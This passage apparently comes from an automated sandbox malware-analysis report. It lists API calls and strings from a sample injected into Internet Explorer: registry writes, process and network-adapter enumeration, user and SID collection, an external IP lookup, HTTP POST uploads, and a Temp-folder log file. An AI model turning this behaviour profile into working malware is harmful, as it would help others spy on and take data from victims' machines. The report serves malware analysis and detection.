    • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 004F1040
      • Part of subcall function 004F3337: _errno.MSVCRT ref: 004F334F
      • Part of subcall function 004F3337: _errno.MSVCRT ref: 004F3396
    • memset.MSVCRT ref: 004F109D
    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 004F10B0
    • GetShortPathNameA.KERNEL32(00000000,00000000,00000104), ref: 004F10D4
    • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020006,?), ref: 004F1130
    • memset.MSVCRT ref: 004F1162
    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 004F118A
    • RegSetValueExA.KERNEL32(?,?,00000000,00000001,00000000,00000001), ref: 004F11EE
    • RegCloseKey.ADVAPI32(?), ref: 004F11FA
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 00517B78, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 83

    Control-flow Graph

    APIs
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
    • WinHttpOpen.WINHTTP(Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;,00000000,00000000,00000000,00000000,00520130,0000001C,00517CB6,?,00000000,?), ref: 00517BA6
    • WinHttpConnect.WINHTTP(00000000,api.ipaddress.com,00000050,00000000), ref: 00517BC2
    • WinHttpOpenRequest.WINHTTP(00000000,GET,/myip?format=txt,00000000,00000000,00000000,00000000), ref: 00517BDE
    • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00517BF4
    • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00517C00
    • WinHttpQueryDataAvailable.WINHTTP(00000000,00000000), ref: 00517C0F
    • WinHttpReadData.WINHTTP(00000000,?,00000020,?), ref: 00517C23
    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00517C30
    • WinHttpCloseHandle.WINHTTP(?), ref: 00517C35
    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00517C38
      • Part of subcall function 00517C51: WinHttpCloseHandle.WINHTTP(?,00517C46), ref: 00517C59
      • Part of subcall function 00517C51: WinHttpCloseHandle.WINHTTP(?,00517C46), ref: 00517C67
      • Part of subcall function 00517C51: WinHttpCloseHandle.WINHTTP(?,00517C46), ref: 00517C75
    Strings
    • api.ipaddress.com, xrefs: 00517BBC
    • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;, xrefs: 00517BA1
    • GET, xrefs: 00517BD8
    • /myip?format=txt, xrefs: 00517BD3
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00518133, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 143filetime

    Control-flow Graph

    APIs
    • memset.MSVCRT ref: 00518179
    • GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
    • ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 0051A5CC: _errno.MSVCRT ref: 0051A5D9
      • Part of subcall function 0051A5CC: _errno.MSVCRT ref: 0051A619
      • Part of subcall function 0051A5CC: _errno.MSVCRT ref: 0051A650
    • memset.MSVCRT ref: 0051821C
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
    • CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
    • GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
    • SetEndOfFile.KERNEL32(00000000), ref: 00518280
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
    • CloseHandle.KERNEL32(00000000), ref: 005182D2
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp, xrefs: 00518257
    • [%d-%d-%d %2d:%2d:%2d] , xrefs: 005181BE
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00517694, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 103

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 455 517694-5176f7 call 51663c call 51a70d CreateToolhelp32Snapshot 460 5176f9-5176fb 455->460 461 517700-51770a Process32FirstW 455->461 462 517793-5177aa call 51a460 460->462 463 517784-517786 461->463 465 517788-517791 CloseHandle 463->465 466 51770c-51770e 463->466 465->462 468 517711-517716 466->468 468->468 469 517718-51771f 468->469 470 517722-51772a 469->470 470->470 471 51772c-517738 470->471 472 517751-51777f realloc call 51a70d Process32NextW 471->472 473 51773a-51773d 471->473 472->463 475 517740-517748 473->475 475->475 477 51774a-51774e 475->477 477->472
    APIs
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
    • ___swprintf_l.LIBCMT ref: 005176D9
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005176EC
    • Process32FirstW.KERNEL32(00000000,?), ref: 00517705
    • realloc.MSVCRT ref: 00517755
    • ___swprintf_l.LIBCMT ref: 00517770
    • Process32NextW.KERNEL32(?,?), ref: 0051777F
    • CloseHandle.KERNEL32(?), ref: 0051778B
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051327C, Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 91

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 478 51327c-5132c3 memset call 51a689 481 5132c6-5132ce 478->481 481->481 482 5132d0-5132e9 WinHttpAddRequestHeaders 481->482 483 513302-513313 WinHttpSendRequest 482->483 484 5132eb-5132f2 GetLastError 482->484 486 513323-513339 WinHttpWriteData 483->486 487 513315-513321 GetLastError 483->487 485 5132f7-5132fc call 517fbe 484->485 496 5132fd-513300 485->496 489 51333b-513347 GetLastError 486->489 490 513349-51334c 486->490 487->485 489->485 491 51334e-513358 call 517fbe 490->491 492 51335a-51335c 490->492 491->496 495 51335d-513369 call 51a460 492->495 496->495
    APIs
    • memset.MSVCRT ref: 005132A2
    • __swprintf_c_l.LIBCMT ref: 005132B8
    • WinHttpAddRequestHeaders.WINHTTP(?,?,?,A0000000,?,?,?,?,?,?,?,00000000), ref: 005132E1
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 005132EB
    • WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0051330B
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00513315
    • WinHttpWriteData.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00513331
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0051333B
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    • Content-Length: %d, xrefs: 005132AB
    • POST WinHttpSendRequest failed! - %d, xrefs: 0051331C
    • WinHttpAddRequestHeaders 'Content-Length' add failed! - %d, xrefs: 005132F2
    • WinHttpWriteData failed! - %d, xrefs: 00513342
    • WinHttpWriteData Imcomplete!, xrefs: 0051334E
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00517FBE, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123filetime
    APIs
    • memset.MSVCRT ref: 00518001
    • GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
    • ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 0051A4F3: _errno.MSVCRT ref: 0051A500
      • Part of subcall function 0051A4F3: _errno.MSVCRT ref: 0051A540
      • Part of subcall function 0051A4F3: _errno.MSVCRT ref: 0051A574
    • CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
    • GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
    • SetEndOfFile.KERNEL32(00000000), ref: 005180CC
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
    • CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • [%d-%d-%d %2d:%2d:%2d] , xrefs: 00518046
    • C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp, xrefs: 005180A7
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00517C7C, Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 278
    APIs
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
      • Part of subcall function 00517694: ___swprintf_l.LIBCMT ref: 005176D9
      • Part of subcall function 00517694: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005176EC
      • Part of subcall function 00517694: Process32FirstW.KERNEL32(00000000,?), ref: 00517705
      • Part of subcall function 00517694: realloc.MSVCRT ref: 00517755
      • Part of subcall function 00517694: ___swprintf_l.LIBCMT ref: 00517770
      • Part of subcall function 00517694: Process32NextW.KERNEL32(?,?), ref: 0051777F
      • Part of subcall function 00517694: CloseHandle.KERNEL32(?), ref: 0051778B
      • Part of subcall function 005177AB: ??2@YAPAXI@Z.MSVCRT ref: 005177C2
      • Part of subcall function 005177AB: GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 005177D3
      • Part of subcall function 005177AB: ??3@YAXPAX@Z.MSVCRT ref: 005177E0
      • Part of subcall function 005177AB: ??2@YAPAXI@Z.MSVCRT ref: 005177E8
      • Part of subcall function 005177AB: GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 005177F7
      • Part of subcall function 005177AB: ??3@YAXPAX@Z.MSVCRT ref: 00517809
      • Part of subcall function 005177AB: ___swprintf_l.LIBCMT ref: 00517830
      • Part of subcall function 005177AB: realloc.MSVCRT ref: 00517875
      • Part of subcall function 005177AB: ___swprintf_l.LIBCMT ref: 005178C8
      • Part of subcall function 005177AB: ___swprintf_l.LIBCMT ref: 005178FB
      • Part of subcall function 005177AB: realloc.MSVCRT ref: 00517949
      • Part of subcall function 005177AB: ___swprintf_l.LIBCMT ref: 00517980
      • Part of subcall function 005177AB: realloc.MSVCRT ref: 005179A8
      • Part of subcall function 005177AB: ___swprintf_l.LIBCMT ref: 005179D6
      • Part of subcall function 005177AB: ??3@YAXPAX@Z.MSVCRT ref: 00517A07
      • Part of subcall function 00517A1E: memset.MSVCRT ref: 00517A4A
      • Part of subcall function 00517A1E: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000010,00000000), ref: 00517A5D
      • Part of subcall function 00517A1E: _findfirst.MSVCRT ref: 00517A87
      • Part of subcall function 00517A1E: realloc.MSVCRT ref: 00517B03
      • Part of subcall function 00517A1E: ___swprintf_l.LIBCMT ref: 00517B2A
      • Part of subcall function 00517A1E: _findnext.MSVCRT ref: 00517B53
      • Part of subcall function 00517B78: WinHttpOpen.WINHTTP(Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;,00000000,00000000,00000000,00000000,00520130,0000001C,00517CB6,?,00000000,?), ref: 00517BA6
      • Part of subcall function 00517B78: WinHttpConnect.WINHTTP(00000000,api.ipaddress.com,00000050,00000000), ref: 00517BC2
      • Part of subcall function 00517B78: WinHttpOpenRequest.WINHTTP(00000000,GET,/myip?format=txt,00000000,00000000,00000000,00000000), ref: 00517BDE
      • Part of subcall function 00517B78: WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00517BF4
      • Part of subcall function 00517B78: WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00517C00
      • Part of subcall function 00517B78: WinHttpQueryDataAvailable.WINHTTP(00000000,00000000), ref: 00517C0F
      • Part of subcall function 00517B78: WinHttpReadData.WINHTTP(00000000,?,00000020,?), ref: 00517C23
      • Part of subcall function 00517B78: WinHttpCloseHandle.WINHTTP(00000000), ref: 00517C30
      • Part of subcall function 00517B78: WinHttpCloseHandle.WINHTTP(?), ref: 00517C35
      • Part of subcall function 00517B78: WinHttpCloseHandle.WINHTTP(00000000), ref: 00517C38
      • Part of subcall function 00517535: GetSystemInfo.KERNELBASE(00000000,80000002,?,?,00000000,00020019,00000340), ref: 00517672
    • GlobalMemoryStatusEx.KERNELBASE(00000000,?,00000000,?), ref: 00517CCD
      • Part of subcall function 00516653: free.MSVCRT(00000000,00513A3A), ref: 0051665E
      • Part of subcall function 00517143: LoadLibraryA.KERNEL32(Netapi32), ref: 00517177
      • Part of subcall function 00517143: GetProcAddress.KERNELBASE(00000000), ref: 0051717E
      • Part of subcall function 00517143: LoadLibraryA.KERNEL32(Netapi32), ref: 00517197
      • Part of subcall function 00517143: GetProcAddress.KERNEL32(00000000), ref: 0051719E
      • Part of subcall function 00517143: memset.MSVCRT ref: 005171B2
      • Part of subcall function 00517143: GetUserNameA.ADVAPI32(000001D0,?), ref: 005171CE
      • Part of subcall function 00517143: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000040), ref: 005171F2
      • Part of subcall function 00517143: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000210,00000040,00000000,00000000), ref: 0051725E
      • Part of subcall function 00517143: ConvertSidToStringSidA.ADVAPI32(?,?), ref: 0051726E
      • Part of subcall function 00516DF6: GetLocaleInfoA.KERNEL32(00000400,00000059,00000298,00000010,00000000,00000040,00000000), ref: 00516E2D
      • Part of subcall function 00516DF6: GetLocaleInfoA.KERNEL32(00000400,0000005A,000002A8,00000010), ref: 00516E4F
      • Part of subcall function 00516DF6: __swprintf_c_l.LIBCMT ref: 0051710B
      • Part of subcall function 00516D52: GetModuleHandleW.KERNEL32(kernel32,GetDiskFreeSpaceExW,00000040,?,?,00517D23,00000000,00000000), ref: 00516D70
      • Part of subcall function 00516D52: GetProcAddress.KERNEL32(00000000,?,?,00517D23,00000000,00000000), ref: 00516D77
      • Part of subcall function 00516D52: GetTempPathW.KERNEL32(00000104,00000000), ref: 00516D98
      • Part of subcall function 00516D52: GetDiskFreeSpaceExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00517D23,00000000,00000000), ref: 00516DAD
      • Part of subcall function 005166E9: IsWow64Process.KERNELBASE(000000FF,00000340,?,?,?,005168F0,?,?,?,00000340,00000000), ref: 005166F4
      • Part of subcall function 005166E9: GetNativeSystemInfo.KERNEL32(?), ref: 005166FE
      • Part of subcall function 005165A8: _vsnprintf.MSVCRT ref: 005165D1
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005148A0, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 68
    APIs
    • memset.MSVCRT ref: 005148B7
    • SHGetSpecialFolderPathA.SHELL32(00000000,-0000D007,0000001C,00000000), ref: 005148C4
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
    • CreateDirectoryA.KERNELBASE(-0000D007,00000000), ref: 005148E1
    • CreateDirectoryA.KERNELBASE(-0000D007,00000000), ref: 005148F5
    • CreateDirectoryA.KERNELBASE(-0000D007,00000000), ref: 00514909
    • ___swprintf_l.LIBCMT ref: 0051493E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00517A1E, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 108
    APIs
    • memset.MSVCRT ref: 00517A4A
    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000010,00000000), ref: 00517A5D
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
    • _findfirst.MSVCRT ref: 00517A87
    • realloc.MSVCRT ref: 00517B03
    • ___swprintf_l.LIBCMT ref: 00517B2A
    • _findnext.MSVCRT ref: 00517B53
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00514548, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171time
    APIs
    • memset.MSVCRT ref: 00514583
    • GetLocalTime.KERNEL32(?,00000000,?,00000000), ref: 005145A6
      • Part of subcall function 0051841D: memset.MSVCRT ref: 00518446
    • GetNativeSystemInfo.KERNEL32(?), ref: 005145EB
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
    • memset.MSVCRT ref: 00514681
      • Part of subcall function 00512B8D: memset.MSVCRT ref: 00512BBC
      • Part of subcall function 00512B8D: wcsstr.MSVCRT ref: 00512BEA
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
    • memset.MSVCRT ref: 005146BC
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,000000AF,00000000,00000000), ref: 005146DB
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005121E5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
    APIs
    • memset.MSVCRT ref: 00512208
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
    • wcsstr.MSVCRT ref: 0051222A
    • _wtoi.MSVCRT ref: 0051223B
    • WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
    • GetLastError.KERNEL32(?,?,00000000), ref: 00512284
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 0051280C: memset.MSVCRT ref: 0051284B
      • Part of subcall function 0051280C: rand.MSVCRT ref: 00512862
      • Part of subcall function 0051280C: WinHttpOpenRequest.WINHTTP(?,GET,?,00000000,00000000,00000000,-002EDD5D,?,00000000,00000000,?,00000000), ref: 005128D5
      • Part of subcall function 0051280C: GetLastError.KERNEL32 ref: 005128E5
      • Part of subcall function 0051280C: WinHttpSetOption.WINHTTP(00000000,00000006,?,00000004), ref: 0051291B
      • Part of subcall function 0051280C: WinHttpQueryOption.WINHTTP(?,0000001F,?,?), ref: 00512949
      • Part of subcall function 0051280C: WinHttpSetOption.WINHTTP(?,0000001F,00003300,00000004), ref: 0051296A
      • Part of subcall function 0051280C: WinHttpSetOption.WINHTTP(?,0000002F,00000000,00000000), ref: 00512972
      • Part of subcall function 0051280C: memset.MSVCRT ref: 0051298A
      • Part of subcall function 0051280C: ___swprintf_l.LIBCMT ref: 005129A7
      • Part of subcall function 0051280C: WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 005129E0
      • Part of subcall function 0051280C: GetLastError.KERNEL32 ref: 005129E6
      • Part of subcall function 0051280C: memset.MSVCRT ref: 00512A0D
      • Part of subcall function 0051280C: ___swprintf_l.LIBCMT ref: 00512A35
      • Part of subcall function 0051280C: WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512A63
      • Part of subcall function 0051280C: GetLastError.KERNEL32 ref: 00512A69
      • Part of subcall function 0051280C: ___swprintf_l.LIBCMT ref: 00512A8D
      • Part of subcall function 0051280C: WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512ABB
      • Part of subcall function 0051280C: GetLastError.KERNEL32 ref: 00512AC1
      • Part of subcall function 0051280C: WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512B0D
      • Part of subcall function 0051280C: GetLastError.KERNEL32 ref: 00512B13
      • Part of subcall function 0051280C: WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512B5F
      • Part of subcall function 0051280C: GetLastError.KERNEL32 ref: 00512B65
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • WinHttpConnect failed! - %d, xrefs: 0051228B
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005149DD, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73file
    APIs
    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 00514A11
    • memcpy.MSVCRT ref: 00514A35
    • ??2@YAPAXI@Z.MSVCRT ref: 00514A3C
      • Part of subcall function 0051841D: memset.MSVCRT ref: 00518446
    • ??3@YAXPAX@Z.MSVCRT ref: 00514A62
    • WriteFile.KERNEL32(?,?,00000269,?,00000000), ref: 00514A7D
    • CloseHandle.KERNEL32(?), ref: 00514A86
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • Ss)4:WKsRr(3/VJrQq&2.UIqPp%1-THp, xrefs: 00514A44
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F1694, Relevance: 10.6, APIs: 7, Instructions: 114library
    APIs
    • memset.MSVCRT ref: 004F16EA
    • GetModuleHandleA.KERNEL32(?,?,00000000,00000000), ref: 004F171B
    • GetLastError.KERNEL32(?,00000000,00000000), ref: 004F1728
    • LoadLibraryExA.KERNELBASE(?,00000000,00000008,?,00000000,00000000), ref: 004F1736
    • GetProcAddress.KERNEL32(?,00000000,?,00000000,00000000), ref: 004F176C
    • GetProcAddress.KERNEL32(?,?,?,00000000,00000000), ref: 004F178C
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    • GetLastError.KERNEL32(?,00000000,00000000), ref: 004F17DC
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 0051476E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102
    APIs
      • Part of subcall function 00514548: memset.MSVCRT ref: 00514583
